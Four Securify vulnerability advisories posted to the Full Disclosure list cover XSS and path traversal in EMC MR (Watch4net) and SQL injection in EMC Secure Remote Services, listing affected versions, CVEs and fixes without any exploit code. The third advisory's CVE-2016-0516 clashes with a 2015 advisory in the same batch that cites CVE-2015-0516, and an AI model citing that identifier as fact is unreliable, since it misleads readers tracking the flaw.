[FD] Cross-Site Scripting vulnerability in EMC MR (Watch4net) Alerting Frontend

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in EMC MR (Watch4net) Alerting
Frontend

Han Sahin, November 2014


Abstract

A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net)
Alerting Frontend. This issue allows attackers to perform a wide
variety of actions, such as stealing victims' session tokens or login
credentials, performing arbitrary actions on their behalf, logging their
keystrokes, or exploit issues in other areas of Watch4net.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0513
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141104/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__alerting_frontend.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Path traversal vulnerability in EMC MR (Watch4net) MIB Browser

2015-03-18 Thread Securify B.V.


Path traversal vulnerability in EMC MR (Watch4net) MIB Browser

Han Sahin, November 2014


Abstract

A path traversal vulnerability was found in EMC MR (Watch4net) MIB
Browser. This vulnerability allows an attacker to access sensitive files
containing configuration data, passwords, database records, log data,
source code, and program scripts and binaries.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0516
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141105/path_traversal_vulnerability_in_emc_m_r__watch4net__mib_browser.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Path traversal vulnerability in EMC MR (Watch4net) Device Discovery

2015-03-18 Thread Securify B.V.


Path traversal vulnerability in EMC MR (Watch4net) Device Discovery

Han Sahin, November 2014


Abstract

A path traversal vulnerability was found in EMC MR (Watch4net) Device
Discovery. This vulnerability allows an attacker to access sensitive
files containing configuration data, passwords, database records, log
data, source code, and program scripts and binaries.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2016-0516
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141106/path_traversal_vulnerability_in_emc_m_r__watch4net__device_discovery.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] EMC Secure Remote Services Virtual Edition Provisioning component is affected by SQL injection

2015-03-18 Thread Securify B.V.


EMC Secure Remote Services Virtual Edition Provisioning component is
affected by SQL injection

Han Sahin, November 2014


Abstract

An SQL injection vulnerability was found in EMC Secure Remote Services
Virtual Edition (ESRS VE) that allows an attacker to retrieve arbitrary
data from the application, interfere with its logic, or execute commands
on the database server itself.


Affected versions

EMC reports that the following versions are affected by this
vulnerability:

- EMC Secure Remote Services Virtual Edition 3.02
- EMC Secure Remote Services Virtual Edition 3.03


See also

- CVE-2015-0524
- ESA-2015-040: EMC Secure Remote Services Virtual Edition Security
Update for Multiple Vulnerabilities


Fix

EMC released EMC Secure Remote Services Virtual Edition 3.04 that
resolves this vulnerability. Registered EMC Online Support customers can
download patches and software from support.emc.com at:

EMC Secure Remote Services - EMC Secure Remote Services Virtual Edition
- Downloads


Details

https://www.securify.nl/advisory/SFY20141113/emc_secure_remote_services_virtual_edition_provisioning_component_is_affected_by_sql_injection.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/